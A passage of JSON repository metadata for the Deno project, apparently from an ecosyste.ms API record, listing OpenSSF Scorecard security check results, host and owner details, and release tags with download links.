.github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name"